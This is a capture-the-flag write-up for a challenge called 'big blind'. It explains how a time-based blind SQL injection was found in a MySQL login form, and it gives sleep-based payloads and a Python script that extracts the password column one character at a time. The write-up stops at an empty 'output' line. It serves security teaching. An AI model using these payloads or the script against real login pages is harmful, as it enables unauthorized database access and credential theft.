big blind Writeup

Solved By : thewhiteh4t

• we are given a login page in this challenge
• the page source does not contain any JS
• After trying several things I found that we get status 500 on using ' in either username or password field
• we don’t get an error if we use ' in both fields
• A better test is to use the following :

user : ''
pass : '

• in the above case we get an error which shows that its due to an un-closed '
• we don’t get an error in the following case :

user : ''
pass : ''

• finally I confirmed that its blind SQL injection by using the following payload :

' or sleep(2) and 1=1#

• so here it was clear that its MySQL because syntax for others are different
• I used SUBSTRING and SLEEP to bruteforce the flag one character at a time
• payload :

' OR IF(SUBSTRING(pass,1,1)='f',sleep(5),sleep(0))#

• Explanation :
  • substring function requires three arguments
  • first argument is the string which we want to check
  • second argument is the position which we want to check
  • third argument is the length we want to check
  • to check one character at a time I incremented second argument each time and kept third argument fixed
• Usage of IF :
  • If uses three arguments
  • first is the condition
  • second is action if condition is True
  • third is action if condition is False
  • so when we find a match we will see a sleep of 5 seconds else page will load immediately
• Automation :

from requests import post, ReadTimeout

url = 'https://big-blind.hsc.tf/'
charset = '_{}flagisodnbcehjkmpqrtuvwxyz'
flag = ''
counter = 0

while flag.endswith('}') != True:
    counter += 1
    for char in charset:
        payload = {
            'user': 'twh',
            'pass': f"' OR IF(SUBSTRING(pass,{counter},1)='{char}',sleep(5),sleep(0))#"
        }
        try:
            r = post(url, data=payload, timeout=3)
        except ReadTimeout:
            flag += char
            print(f'FLAG : {flag}')
            break

• output :